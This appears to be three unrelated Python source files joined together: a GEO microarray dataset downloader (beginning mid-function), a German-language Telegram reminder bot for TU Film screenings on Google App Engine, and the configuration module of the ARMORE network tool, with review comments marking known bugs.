    from genomicode import affyio
    import gzip
    #file_folder = os.path.join(".", GSEID)
    file_folder = module_utils.download_dataset(GSEID)
    #get chip name
    cel_files = os.listdir(file_folder)
    unknown_folder = os.path.join(".", 'unknown_folder')
    chip_name_list = []
    for cel_file in cel_files:
        fileloc = os.path.join(file_folder, cel_file)
        if fileloc.endswith('.gz'):
            newcelfname = clean_cel_filename(os.path.splitext(cel_file)[0])
            #unzip the gz data
            unzipfile = os.path.splitext(fileloc)[0]
            fileObj = gzip.GzipFile(fileloc, 'rb')
            fileObjOut = file(unzipfile, 'wb')
            while 1:
                line = fileObj.readline()
                if line == '':
                    break
                fileObjOut.write(line)
            fileObj.close()
            fileObjOut.close()
            assert os.path.exists(unzipfile), ('the unzip %s fails' % unzipfile
                                               )
        else:
            unzipfile = fileloc
            newcelfname = clean_cel_filename(cel_file)
        #get chip_name and copy into different folder
        chip_name = None
        try:
            chip_name = affyio.extract_chip_name(unzipfile)
        except (SystemError, MemoryError, KeyError), x:
            raise
        except Exception, x:
            # Unrecognized chip: park the file in unknown_folder.
            if not os.path.exists(unknown_folder):
                os.mkdir(unknown_folder)
            shutil.copyfile(unzipfile,
                            os.path.join(unknown_folder, newcelfname))
        if chip_name is not None:
            if chip_name not in chip_name_list:
                chip_name_list.append(chip_name)
                os.mkdir(os.path.join(".", chip_name))
            chip_folder = os.path.join(".", chip_name)
            shutil.copyfile(unzipfile, os.path.join(chip_folder, newcelfname))
        if fileloc.endswith('.gz'):
            os.remove(unzipfile)
    #determine the one to preprocess
    if len(chip_name_list) == 1:
        out_filename = os.path.join(".", chip_name_list[0])
    elif len(chip_name_list) > 1:
        # NOTE(review): getsize() on a directory returns the directory
        # entry's size, not its contents' total -- confirm intent.
        size_list = [os.path.getsize(os.path.join(".", x))
                     for x in chip_name_list]
        #makesure there is no multiple folder have the same maximum size
        maxsize = max(size_list)
        new_size_list = size_list[:]
        new_size_list.remove(maxsize)
        #only one folder is maximum size
        if maxsize > max(new_size_list):
            out_chip_name = chip_name_list[size_list.index(maxsize)]
            # NOTE(review): the next line is commented out, so out_filename
            # is never assigned on this branch and os.rename() below raises
            # NameError -- likely a latent bug.
            #out_filename = os.path.join(".", out_chip_name)
        #multiple has same maximum size
        elif maxsize == max(new_size_list):
            start = -1
            folder_index = []
            while start < len(size_list) - 1:
                try:
                    start = size_list.index(maxsize, start + 1)
                    folder_index.append(start)
                except (SystemError, MemoryError, KeyError), x:
                    raise
                except Exception:
                    break
            folder_names = [chip_name_list[x] for x in folder_index]
            Is_HG = [x.startswith('HG') for x in folder_names]
            a = []
            for i in Is_HG:
                if i:
                    a.append(1)
                else:
                    a.append(0)
            #choose the human platform
            if sum(a) == 1:
                out_chip_name = folder_names[a.index(1)]
                out_filename = os.path.join(".", out_chip_name)
            #multiple human platforms: prefer the newest/most common one
            elif sum(a) > 1:
                if 'HG-U133_Plus_2' in folder_names:
                    out_filename = os.path.join(".", 'HG-U133_Plus_2')
                elif 'HG-U133A' in folder_names:
                    out_filename = os.path.join(".", 'HG-U133A')
                elif 'HG-U95A' in folder_names:
                    out_filename = os.path.join(".", 'HG-U95A')
                else:
                    raise ValueError('does not recognazie the platform')
    os.rename(out_filename, outfile)
    # NOTE(review): this single-argument call matches the second
    # get_seriesmatrix_file definition (which shadows the two-argument one
    # below) -- verify which definition is intended.
    matrix_files = get_seriesmatrix_file(GSEID)
    for matrix_file in matrix_files:
        newmatrix_filename = os.path.split(matrix_file)[-1]
        shutil.copyfile(matrix_file, os.path.join(outfile, newmatrix_filename))
def download_geo_with_GPLID(GSEID, GPLID, outfile):
    """Download GEO files for *GSEID*, keeping only CEL files whose GSM ids
    appear in the series-matrix file(s) of platform *GPLID*; the kept files
    plus the matrix files are placed in *outfile*.

    If no platform matrix files are found, the whole download is moved to
    *outfile* unchanged.
    """
    import os
    import shutil
    from Betsy import module_utils
    GSEID_path = module_utils.download_dataset(GSEID)
    platform_txtfiles = get_seriesmatrix_file(GSEID, GPLID)
    #get the cel file name for the GPL platform
    if not os.path.exists(outfile):
        os.mkdir(outfile)
    if len(platform_txtfiles) > 0:
        for platform_txtfile in platform_txtfiles:
            cel_list = open(platform_txtfile, 'r').readlines()
            # Locate the '!Sample_geo_accession' header line (lists GSM ids).
            cel_line = None
            for linecontent in cel_list:
                if linecontent.startswith('!Sample_geo_accession'):
                    cel_line = linecontent
                    break
            assert cel_line, (
                'the file %s does not contain "!Sample_geo_accession"' %
                platform_txtfile)
            filecontent = os.listdir(GSEID_path)
            cel_names = []
            # BUG FIX: parse the matched header line (cel_line) instead of
            # the leaked loop variable `linecontent`.
            for x in cel_line.split()[1:]:
                x = x.strip()
                assert x.startswith('\"') and x.endswith('\"')
                x = x[1:-1]  # strip the surrounding quotes
                cel_names.append(x)
            #check if the GSM Id cannot found in the data set
            file_name_string = ' '.join(filecontent)
            for cel_name in cel_names:
                if cel_name not in file_name_string:
                    raise ValueError(
                        'The GSM ID %s cannot find in data set' % cel_name)
                else:
                    for cel_file in filecontent:
                        if cel_file.upper().startswith(cel_name.upper()):
                            if cel_file.lower().endswith('gz'):
                                # NOTE(review): copying by the cleaned name
                                # assumes it matches the on-disk name --
                                # confirm against clean_cel_filename.
                                cel_file = clean_cel_filename(
                                    os.path.splitext(cel_file)[0]) + '.gz'
                            outfilename = os.path.join(outfile, cel_file)
                            shutil.copyfile(os.path.join(GSEID_path, cel_file),
                                            outfilename)
    else:
        os.rename(GSEID_path, outfile)
    for matrix_file in platform_txtfiles:
        newmatrix_filename = os.path.split(matrix_file)[-1]
        shutil.copyfile(matrix_file, os.path.join(outfile, newmatrix_filename))
def get_seriesmatrix_file(GSEID, GPLID):
    """Download series-matrix files for GSEID matching GPLID and unzip them.

    Returns a list of absolute paths to the unzipped text files.
    Raises ValueError when the FTP connection fails and AssertionError when
    the series directory does not exist on the server.
    """
    import os
    import gzip
    from ftplib import FTP, error_perm
    try:
        ftp = FTP('ftp.ncbi.nih.gov')
        ftp.login()
    except Exception as e:
        raise ValueError(e)
    try:
        ftp.cwd('pub/geo/DATA/SeriesMatrix/' + GSEID)
    except error_perm as x:
        # BUG FIX: was `except FTP.error_perm` (no such attribute on the FTP
        # class -- the exception lives on the ftplib module) and the message
        # referenced an undefined name `path`.
        if str(x).find('No such file') >= 0:
            raise AssertionError('cannot find the %s' % GSEID)
        raise  # other permission errors were silently swallowed before
    entry = []
    ftp.retrlines('NLST', entry.append)
    platform_txtfiles = []
    for platform_filename in entry:
        if GPLID in platform_filename:
            f = open(platform_filename, 'wb')
            ftp.retrbinary('RETR ' + platform_filename, f.write)
            f.close()
            platform_txtfile = platform_filename[:-3]  # strip '.gz'
            assert not os.path.exists(platform_txtfile), (
                'the seriesmatrix file %s already exists' % platform_txtfile
            )
            # unzip the gz data
            fileObj = gzip.GzipFile(platform_filename, 'rb')
            fileObjOut = open(platform_txtfile, 'wb')
            while 1:
                line = fileObj.readline()
                # BUG FIX: `line == ''` never matches the bytes GzipFile
                # yields under Python 3; truthiness works for str and bytes
                if not line:
                    break
                fileObjOut.write(line)
            fileObj.close()
            fileObjOut.close()
            os.remove(platform_filename)
            assert os.path.exists(platform_txtfile), (
                'the unzip %s in download_geo_dataset_GPL fails' % platform_txtfile
            )
            platform_txtfiles.append(os.path.realpath(platform_txtfile))
    ftp.close()
    return platform_txtfiles
def get_seriesmatrix_file(GSEID, GPLID=None):
    """Download series-matrix files for GSEID and unzip them.

    GPLID -- optional platform id; when given, only files whose name
             contains GPLID are downloaded.  BUG FIX: this definition
             shadows the two-argument version defined above, which broke
             the two-argument call site; accepting an optional GPLID keeps
             both call sites working.

    Returns a list of absolute paths to the unzipped text files.
    Raises ValueError when the FTP connection cannot be established.
    """
    import os
    import gzip
    from ftplib import FTP
    try:
        ftp = FTP('ftp.ncbi.nih.gov')
        ftp.login()
    except Exception as e:
        raise ValueError(e)
    ftp.cwd('pub/geo/DATA/SeriesMatrix/' + GSEID)
    entry = []
    ftp.retrlines('NLST', entry.append)
    platform_txtfiles = []
    for platform_filename in entry:
        # filter by platform only when a GPLID was requested
        if GPLID is not None and GPLID not in platform_filename:
            continue
        f = open(platform_filename, 'wb')
        ftp.retrbinary('RETR ' + platform_filename, f.write)
        f.close()
        platform_txtfile = platform_filename[:-3]  # strip '.gz'
        assert not os.path.exists(platform_txtfile), (
            'the seriesmatrix file %s already exists' % platform_txtfile
        )
        # unzip the gz data
        fileObj = gzip.GzipFile(platform_filename, 'rb')
        fileObjOut = open(platform_txtfile, 'wb')
        while 1:
            line = fileObj.readline()
            # truthiness works for both str (py2) and bytes (py3)
            if not line:
                break
            fileObjOut.write(line)
        fileObj.close()
        fileObjOut.close()
        os.remove(platform_filename)
        assert os.path.exists(platform_txtfile), (
            'the unzip %s in download_geo_dataset_GPL fails' % platform_txtfile
        )
        platform_txtfiles.append(os.path.realpath(platform_txtfile))
    ftp.close()
    return platform_txtfiles
|
# encoding: utf-8
import json
import logging
from urllib2 import urlopen
from urllib import urlencode
from datetime import datetime
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
import webapp2
TOKEN = open('bot.token').read()
BASE_URL = 'https://api.telegram.org/bot' + TOKEN + '/'
BOT_NAME = 'tufilmbot'
# ================================
# Data store classes
class Subscriber(ndb.Model):
    """Datastore entity: a Telegram chat subscribed to movie reminders."""
    # Telegram chat id of the subscriber
    chat_id = ndb.IntegerProperty()
class Movie(ndb.Model):
    """Datastore entity: one scheduled TU Film screening."""
    title = ndb.StringProperty()
    # screening start time (parsed from '%Y-%m-%dT%H:%M' in add_movie)
    date = ndb.DateTimeProperty()
    # info page link
    url = ndb.StringProperty()
    imdbLink = ndb.StringProperty()
    # rating kept as a string as delivered by the crawler/request
    imdbRating = ndb.StringProperty()
# ================================
# Helper functions
def add_subscriber(c_id):
    """Register chat `c_id` for reminders; return 1 if newly added, 0 if already known."""
    existing = Subscriber.query(Subscriber.chat_id == c_id).fetch()
    if existing:
        return 0
    Subscriber(chat_id=c_id).put()
    return 1
def remove_subscriber(c_id):
    """Unregister chat `c_id`; return 1 when a subscription was removed, else 0."""
    found = Subscriber.query(Subscriber.chat_id == c_id).fetch()
    if not found:
        return 0
    found[0].key.delete()
    return 1
def add_movie(title, date, url, imdblink, imdbrating):
    """Store a new Movie entity; `date` must be a '%Y-%m-%dT%H:%M' string."""
    parsed_date = datetime.strptime(date, '%Y-%m-%dT%H:%M')
    movie = Movie(title=title,
                  date=parsed_date,
                  url=url,
                  imdbLink=imdblink,
                  imdbRating=imdbrating)
    movie.put()
def get_formatted_movie_list():
    """Return one line per upcoming movie: 'DD.MM.YYYY: title\\n'."""
    upcoming = Movie.query(Movie.date >= datetime.now()).fetch()
    upcoming.sort(key=lambda m: m.date)
    return ''.join(m.date.strftime('%d.%m.%Y') + ': ' + m.title + '\n'
                   for m in upcoming)
def get_next_movie():
    """Return the upcoming Movie with the earliest date (IndexError if none)."""
    upcoming = Movie.query(Movie.date >= datetime.now()).fetch()
    return sorted(upcoming, key=lambda m: m.date)[0]
def get_formatted_short_reminder(next_movie):
    """Build the one-line reminder text for today's screening."""
    start = next_movie.date.strftime('%H:%M Uhr')
    return ('Nicht vergessen, heute im TU Film: ' + next_movie.title
            + '\nBeginn um ' + start)
def get_formatted_movie(head, title, date=None, url=None, imdblink=None, imdbrating=None):
    """Build an HTML-formatted movie announcement for Telegram.

    Sections (date, info link, IMDb link, rating) are appended only for
    truthy arguments.
    """
    parts = ['<b>' + head + '</b>\n' + title]
    if date:
        parts.append('\n' + date.strftime('%d.%m.%Y um %H:%M Uhr'))
    if url:
        parts.append('\nInfos: <a href="' + url + '">Link</a>')
    if imdblink:
        parts.append('\nIMDb: <a href="' + imdblink + '">Link</a>')
    if imdbrating:
        parts.append(u'\nIMDb ★: ' + imdbrating)
    return ''.join(parts)
# Send a message from the Bot
# HTML encoded
def reply(chat_id, msg=None):
    """Send `msg` to `chat_id` via the Telegram sendMessage API (HTML mode).

    Logs an error and sends nothing when `msg` is falsy; the raw API
    response (or None) is logged either way.
    """
    if msg:
        resp = urlopen(BASE_URL + 'sendMessage', urlencode({
            'chat_id': str(chat_id),
            'text': msg.encode('utf-8'),
            'parse_mode': 'HTML',
            'disable_web_page_preview': 'true',
        })).read()
    else:
        logging.error('no message specified')
        resp = None
    logging.info('send response:')
    logging.info(resp)
# ================================
# Google App Request Handlers
# set the web hook for the Telegram API
class SetWebHookHandler(webapp2.RequestHandler):
    """GET /set_webhook?url=... registers `url` as the Telegram webhook."""
    def get(self):
        urlfetch.set_default_fetch_deadline(60)
        url = self.request.get('url')
        if url:
            # forward Telegram's JSON answer to the caller
            self.response.write(json.dumps(json.load(urlopen(BASE_URL + 'setWebhook', urlencode({'url': url})))))
# triggered over cron job
class ReminderHandler(webapp2.RequestHandler):
    """Cron endpoint: send a reminder when the next movie runs today."""
    def get(self):
        next_movie = get_next_movie()
        if datetime.date(datetime.now()) == next_movie.date.date():
            all_subscriber = Subscriber.query(projection=["chat_id"], distinct=True)
            # send the same reminder message to every subscriber
            # NOTE: with many subscribers the Telegram API rate limits apply
            msg = get_formatted_short_reminder(next_movie)
            for sub in all_subscriber:
                reply(sub.chat_id, msg)
# Handler for adding a new Movie over a URL
class MovieHandler(webapp2.RequestHandler):
    """GET /add_movie?title=...&date=... stores a new movie from query params."""
    def get(self):
        urlfetch.set_default_fetch_deadline(60)
        title = self.request.get('title')
        date = self.request.get('date')  # expected format: %Y-%m-%dT%H:%M
        url = self.request.get('url')
        imdblink = self.request.get('imdblink')
        imdbrating = self.request.get('imdbrating')
        add_movie(title, date, url, imdblink, imdbrating)
# Starts the crawler
# Does nothing currently because the crawler script ist not yet imported
class GetMoviesHandler(webapp2.RedirectHandler):
    """Placeholder for the crawler trigger.

    NOTE(review): the loop below executes once at class-definition time,
    not per request, and movie_list is empty, so this handler currently
    does nothing; it also subclasses RedirectHandler rather than
    RequestHandler -- confirm both are intentional.
    """
    # links = get_all_title_links()
    # movie_list = get_movie_details(links)
    movie_list = []
    for movie in movie_list:
        add_movie(movie[0], movie[1], movie[2], movie[3], movie[4])
# Handles messages from Telegram
class WebHookHandler(webapp2.RequestHandler):
    """Telegram webhook endpoint: parses an update and dispatches commands."""
    def post(self):
        urlfetch.set_default_fetch_deadline(60)
        json_body = json.loads(self.request.body)
        # log request
        logging.info('request body:')
        logging.info(json_body)
        self.response.write(json.dumps(json_body))
        # get chat and message information
        message = json_body['message']
        text = message.get('text')
        chat = message['chat']
        chat_id = chat['id']
        if not text:
            logging.info('no text')
            return
        if text.startswith('/'):
            # in group chats commands arrive as '/cmd@botname'; strip the
            # suffix when it names this bot, otherwise ignore the message
            if text.find('@') > 0:
                if text.find(BOT_NAME) > 0:
                    text = text[0:text.find('@')]
                else:
                    return
            if text == '/subscribe':
                if add_subscriber(chat_id) == 1:
                    reply(chat_id, 'Für den Alarm angemeldet!')
                else:
                    reply(chat_id, 'Bereits angemeldet!')
            elif text == '/unsubscribe':
                if remove_subscriber(chat_id) == 1:
                    reply(chat_id, 'Abgemeldet vom Alarm!')
                else:
                    reply(chat_id, 'Nicht angemeldet!')
            elif text == '/listall':
                reply(chat_id, get_formatted_movie_list())
            elif text == '/next':
                next_movie = get_next_movie()
                reply(chat_id, get_formatted_movie(u'Als nächstes im TU Film',
                                                   next_movie.title,
                                                   next_movie.date,
                                                   next_movie.url,
                                                   next_movie.imdbLink,
                                                   next_movie.imdbRating))
            else:
                # unknown command fallback
                reply(chat_id, u'Befehl ungebekannt. Benutze / für eine Überischt möglicher Befehle.')
        else:
            # non-command messages are silently ignored
            # reply(chat_id, "Use /<command>. See possible commands with /? or /commands.")
            return
# The App
# Route table: maps URL paths to their request handlers.
app = webapp2.WSGIApplication([
    ('/set_webhook', SetWebHookHandler),
    ('/webhook', WebHookHandler),
    ('/reminder', ReminderHandler),
    ('/add_movie', MovieHandler),
    ('/get_movies', GetMoviesHandler),
], debug=True)
|
# source/webServer/domains/support/config.py
# # # #
# config.py
#
# University of Illinois/NCSA Open Source License
# Copyright (c) 2015 Information Trust Institute
# All rights reserved.
#
# Developed by:
#
# Information Trust Institute
# University of Illinois
# http://www.iti.illinois.edu
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal with
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# Redistributions of source code must retain the above copyright notice, this list
# of conditions and the following disclaimers. Redistributions in binary form must
# reproduce the above copyright notice, this list of conditions and the following
# disclaimers in the documentation and/or other materials provided with the
# distribution.
#
# Neither the names of Information Trust Institute, University of Illinois, nor
# the names of its contributors may be used to endorse or promote products derived
# from this Software without specific prior written permission.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE CONTRIBUTORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS WITH THE SOFTWARE.
#
# # # # #
import domains.support.lib.common as comLib
import domains.support.network as netLib
import re
import os.path
import threading
from string import Template
# These get called a lot, get them once when read in to prevent lots of file reads
# Resolved paths of all config and template support files, cached at import time.
ARMORE_CFG_FILE = comLib.getSupportFilePath("ArmoreConfig")
PROXY_CFG_FILE_BACKEND = comLib.getSupportFilePath("ProxyConfigBackend")
PROXY_CFG_FILE = comLib.getSupportFilePath("ProxyConfig")
TRANSPARENT_CFG_FILE = comLib.getSupportFilePath("TransparentConfig")
PASSIVE_CFG_FILE = comLib.getSupportFilePath("PassiveConfig")
PROXY_NETWORK_FILE = comLib.getSupportFilePath("ProxyNetworkTemplate")
PASSIVE_NETWORK_FILE = comLib.getSupportFilePath("PassiveNetworkTemplate")
TRANSPARENT_NETWORK_FILE = comLib.getSupportFilePath("TransparentNetworkTemplate")
PROXY_CFG_BACKEND_TEMPLATE = comLib.getSupportFilePath("ProxyConfigBackendTemplate")
PASSIVE_CFG_BACKEND_TEMPLATE = comLib.getSupportFilePath("PassiveConfigBackendTemplate")
TRANSPARENT_CFG_BACKEND_TEMPLATE = comLib.getSupportFilePath("TransparentConfigBackendTemplate")

# config file per operation-mode name
cfgFiles = {
    'armore': ARMORE_CFG_FILE,
    'proxy': PROXY_CFG_FILE,
    'transparent': TRANSPARENT_CFG_FILE,
    'passive': PASSIVE_CFG_FILE
}

# /etc/network/interfaces template per operation-mode name
netFiles = {
    'proxy': PROXY_NETWORK_FILE,
    'transparent': TRANSPARENT_NETWORK_FILE,
    'passive': PASSIVE_NETWORK_FILE
}
def restartProxy():
    """Restart the ARMORE service via its init script."""
    comLib.cmd('/etc/init.d/armoreconfig stop')
    comLib.cmd('/etc/init.d/armoreconfig start')
    #comLib.cmd('broctl restart')
def restartBro():
    """Restart the Bro IDS via broctl."""
    comLib.cmd('broctl restart')
# Gets configuration from specified file as key value pair
def getConfigFromFile(theFile):
    """Parse `theFile` as KEY=VALUE lines into a dict.

    Surrounding whitespace is stripped and double quotes are removed from
    both key and value.  Lines without '=' are skipped.  Returns {} when
    the file does not exist.
    """
    ret = {}
    if os.path.exists(theFile):
        # `with` guarantees the handle is closed (it was leaked before)
        with open(theFile, 'r') as configFile:
            for l in configFile:
                if '=' not in l:
                    continue
                # split on the FIRST '=' only so values containing '='
                # no longer raise ValueError during unpacking
                key, value = [re.sub(r'"', "", x.strip())
                              for x in l.rstrip().split('=', 1)]
                ret[key] = value
    return ret
# Synchronizes the webServer config files and the backend config files
def synchConfigs():
    """Synchronize the webServer config files with the backend config file.

    Reads the backend config, rebuilds the armore-level and mode-level
    dicts, and rewrites all three config layers.  Returns the armore-level
    dict, or None when the backend config has no Operation entry.
    """
    armoreBackConf = getArmoreConfigBackend()
    if "Operation" not in armoreBackConf:
        return
    mode = armoreBackConf.get("Operation")
    # armore-level (management/network) settings
    aConf = {}
    aConf["managementIp"] = armoreBackConf.get("ManagementIp")
    aConf["managementInterface"] = armoreBackConf.get("ManagementInt")
    aConf["managementMask"] = armoreBackConf.get("ManagementMask")
    aConf["operationMode"] = mode
    # mode-specific settings
    mConf = {}
    if mode == "Proxy":
        mConf["roleType"] = armoreBackConf.get("Roletype")
        mConf["port"] = armoreBackConf.get("Port")
        mConf["bind"] = armoreBackConf.get("Bind")
        mConf["capture"] = armoreBackConf.get("Capture")
        mConf["encryption"] = armoreBackConf.get("Encryption")
        mConf["firewall"] = armoreBackConf.get("Firewall")
        mConf["interface"] = armoreBackConf.get("Interface")
        mConf["operationMode"] = "Proxy"
    if mode == "Passive":
        mConf["operationMode"] = "Passive"
        mConf["monitored_interface"] = armoreBackConf.get("Interface")
        aConf["internalInterface"] = mConf.get("monitored_interface")
        aConf["internalIp"] = netLib.getIpAddrFromInt(mConf.get("monitored_interface"))
    if mode == "Transparent":
        # NOTE(review): uses the key "Operation" where the other branches use
        # "operationMode" -- confirm this asymmetry is intentional
        mConf["Operation"] = "Transparent"
        mConf["interface1"] = armoreBackConf.get("Interface1")
        mConf["interface2"] = armoreBackConf.get("Interface2")
        mConf["bridgeIp"] = armoreBackConf.get("Bind")
        mConf["broadcastIp"] = armoreBackConf.get("BroadcastIp")
        mConf["netmask"] = armoreBackConf.get("Netmask")
        mConf["gateway"] = armoreBackConf.get("Gateway")
        mConf["route"] = armoreBackConf.get("Route")
    updateConfig(mConf, "mode")
    updateConfig(aConf, "armore")
    # the backend file gets the union of both layers
    maConf = mConf.copy()
    maConf.update(aConf)
    updateConfig(maConf, "backend")
    return aConf
# Get management interface information
def getMgmtConfig():
    """Return only the Management* entries of the backend configuration."""
    full = getArmoreConfigBackend()
    return {k: v for k, v in full.items() if re.match(".*Management.*", k)}
def getArmoreConfigBackend():
    """Return the backend (daemon) configuration as a dict."""
    return getConfigFromFile(PROXY_CFG_FILE_BACKEND)

def getArmoreConfig():
    """Return the general ARMORE web configuration as a dict."""
    return getConfigFromFile(ARMORE_CFG_FILE)

def getProxyConfig():
    """Return the Proxy-mode configuration as a dict."""
    return getConfigFromFile(PROXY_CFG_FILE)

def getTransparentConfig():
    """Return the Transparent-mode configuration as a dict."""
    return getConfigFromFile(TRANSPARENT_CFG_FILE)

def getPassiveConfig():
    """Return the Passive-mode configuration as a dict."""
    return getConfigFromFile(PASSIVE_CFG_FILE)
# Generic function for getting a configuration
def getConfig(mode):
    """Dispatch to the reader for `mode`; defaults to the armore config."""
    readers = {
        "proxy": getProxyConfig,
        "passive": getPassiveConfig,
        "transparent": getTransparentConfig,
    }
    return readers.get(mode.lower(), getArmoreConfig)()
# Write configuration to a template and output file
def writeTemplate(inp, tempFile, outFile):
    """Substitute mapping `inp` into the Template at `tempFile` and write to `outFile`.

    Raises KeyError when a placeholder in the template is missing from `inp`.
    """
    # `with` closes the template handle, which was leaked before
    with open(tempFile, 'r') as t:
        template = Template(t.read())
    rendered = template.substitute(inp)
    with open(outFile, 'w') as f:
        f.write(rendered)
# Write configuration information to the configuration file
def writeConfig(config, theType):
    """Render `config` into the template/config-file pair for its type.

    theType == "armore" selects the armore config; otherwise the target is
    chosen from config["operationMode"].  An unrecognized mode only prints
    a warning and writes nothing.
    """
    #aConf = Template(open(comLib.getSupportFilePath("ArmoreConfigTemplate"), 'r').read())
    confFileTemp = None
    confFileToWrite = None
    if theType == "armore":
        confFileTemp = comLib.getSupportFilePath("ArmoreConfigTemplate")
        confFileToWrite = ARMORE_CFG_FILE
    elif config.get("operationMode") == "Proxy":
        confFileTemp = comLib.getSupportFilePath("ProxyConfigTemplate")
        confFileToWrite = PROXY_CFG_FILE
    elif config.get("operationMode") == "Passive":
        confFileTemp = comLib.getSupportFilePath("PassiveConfigTemplate")
        confFileToWrite = PASSIVE_CFG_FILE
    elif config.get("operationMode") == "Transparent":
        confFileTemp = comLib.getSupportFilePath("TransparentConfigTemplate")
        confFileToWrite = TRANSPARENT_CFG_FILE
    else:
        print("# Unable to write config for '{}' mode".format(config.get("operationMode")))
    if confFileTemp:
        writeTemplate(config, confFileTemp, confFileToWrite)
def updateProxyConfig(config):
    """Merge submitted Proxy settings over the stored ones.

    Preference per field: new form name, then old field name, then the
    value currently stored on disk.
    """
    stored = getConfig("proxy")
    merged = {"operationMode": "Proxy"}
    merged["roleType"] = config.get("networkRole") or config.get("roleType") or stored.get("RoleType")
    merged["port"] = config.get("targetPort") or config.get("port") or stored.get("Port")
    merged["bind"] = config.get("targetIp") or config.get("bind") or stored.get("Bind")
    merged["capture"] = config.get("captureMode") or config.get("capture") or stored.get("Capture")
    merged["encryption"] = config.get("encryption") or stored.get("Encryption")
    merged["firewall"] = config.get("firewall") or stored.get("Firewall")
    merged["interface"] = config.get("monIntProxy") or config.get("interface") or stored.get("Interface")
    return merged
def updatePassiveConfig(config):
    """Merge submitted Passive settings over the stored ones."""
    stored = getPassiveConfig()
    chosen = (config.get("monIntPsv") or config.get("monitored_interface")
              or stored.get("Monitored_Interface"))
    return {"monitored_interface": chosen, "operationMode": "Passive"}
def updateTransparentConfig(config):
    """Merge submitted Transparent settings over the stored ones."""
    stored = getTransparentConfig()
    merged = {"operationMode": "Transparent"}
    merged["netmask"] = config.get("netmask") or stored.get("Netmask")
    merged["broadcastIp"] = config.get("broadcastIp") or stored.get("BroadcastIp")
    merged["bridgeIp"] = config.get("bridgeIp") or stored.get("BridgeIp")
    merged["interface1"] = config.get("brdgInt1") or config.get("interface1") or stored.get("Interface1")
    merged["interface2"] = config.get("brdgInt2") or config.get("interface2") or stored.get("Interface2")
    merged["gateway"] = config.get("gateway") or stored.get("Gateway")
    merged["route"] = config.get("route") or stored.get("Route")
    return merged
def updateArmoreConfig(config):
    """Merge submitted armore-level settings over the stored ones.

    Returns (newConfig, restartFlask) where restartFlask is True when the
    management IP changed and the web server must be restarted.
    """
    oldConfig = getArmoreConfig()
    internalInt = config.get("intInt") or oldConfig.get("Internal_Interface")
    externalInt = config.get("extInt") or oldConfig.get("External_Interface")
    newConfig = {
        "operationMode": config.get("operationMode") or config.get("Operation") or oldConfig.get("Operation"),
        "managementIp": config.get("mgtIp") or config.get("managementIp") or oldConfig.get("Management_IP"),
        "managementMask": config.get("mgtMsk") or config.get("managementMask") or oldConfig.get("Management_Mask"),
        "managementInterface": config.get("mgtInt") or config.get("managementInterface") or oldConfig.get("Management_Interface"),
        "internalInterface": internalInt,
        # when neither form nor stored value exists, probe the interface itself
        "internalIp": config.get("intIp") or oldConfig.get("Internal_IP") or netLib.getIpAddrFromInt(internalInt),
        "internalMask": config.get("intMsk") or oldConfig.get("Internal_Mask") or netLib.getNetmaskFromInt(internalInt),
        "externalInterface": externalInt,
        "externalIp": config.get("extIp") or oldConfig.get("External_IP") or netLib.getIpAddrFromInt(externalInt),
        "externalMask": config.get("extMsk") or oldConfig.get("External_Mask") or netLib.getNetmaskFromInt(externalInt),
    }
    restartFlask = oldConfig.get("Management_IP") != newConfig.get("managementIp")
    return newConfig, restartFlask
# Writes the backend configuration file
def writeBackendConfig(config):
    """Render the backend config file for the mode named in `config`.

    Raises ValueError for an unrecognized operationMode.  Previously an
    unknown mode fell through and crashed inside writeTemplate trying to
    open None.
    """
    mode = config.get("operationMode")
    templates = {
        "Proxy": PROXY_CFG_BACKEND_TEMPLATE,
        "Passive": PASSIVE_CFG_BACKEND_TEMPLATE,
        "Transparent": TRANSPARENT_CFG_BACKEND_TEMPLATE,
    }
    if mode not in templates:
        raise ValueError("Unknown operation mode: {}".format(mode))
    writeTemplate(config, templates[mode], PROXY_CFG_FILE_BACKEND)
# Changes existing settings to newly submitted values
def updateConfig(config, confType, enforce=False):
    """Update the config layer named by `confType` ("mode"/"armore"/"backend").

    When `enforce` is True the mode update also rewrites the armore and
    backend configs, regenerates /etc/network/interfaces and restarts the
    ARMORE service.  Always returns False.
    """
    mode = config.get("operationMode") or config.get("Operation")
    newConfig = None
    restartFlask = False
    if confType == "mode":
        if mode.lower() == "proxy":
            newConfig = updateProxyConfig(config)
        elif mode.lower() == "passive":
            newConfig = updatePassiveConfig(config)
        elif mode.lower() == "transparent":
            newConfig = updateTransparentConfig(config)
        # NOTE(review): an unrecognized mode leaves newConfig as None and
        # writeConfig(None, ...) will fail -- confirm callers always pass a
        # valid mode
        writeConfig(newConfig, confType)
        if enforce:
            newArmoreConfig, restartFlask = updateArmoreConfig(config)
            writeConfig(newArmoreConfig, "armore")
            # backend file takes the union of both layers
            amConf = newConfig.copy()
            amConf.update(newArmoreConfig)
            writeBackendConfig(amConf)
            print("# Restarting ARMORE service...")
            writeInterfacesFile(amConf, mode.lower())
            restartProxy()
    elif confType == "armore":
        newArmoreConfig, restartFlask = updateArmoreConfig(config)
        writeConfig(newArmoreConfig, confType)
    elif confType == "backend":
        writeBackendConfig(config)
    return False
def writeArmoreConfig(config):
    """Serialize `config` to ARMORE_CFG_FILE as a bash-style KEY="VALUE" file.

    Nested dicts are flattened to Outer_Inner="value" lines; non-str,
    non-dict values are skipped.  Returns True when the management IP
    changed (the caller must then restart the Flask server).
    """
    oldConfig = getConfigFromFile(ARMORE_CFG_FILE)
    lines = ["#!/usr/bin/env bash\n"]
    for key in config:
        if type(config[key]) is dict:
            for k in config[key]:
                lines.append("{0}_{1}=\"{2}\"\n".format(key, k, config[key][k]))
        elif type(config[key]) is str:
            lines.append("{0}=\"{1}\"\n".format(key, config[key]))
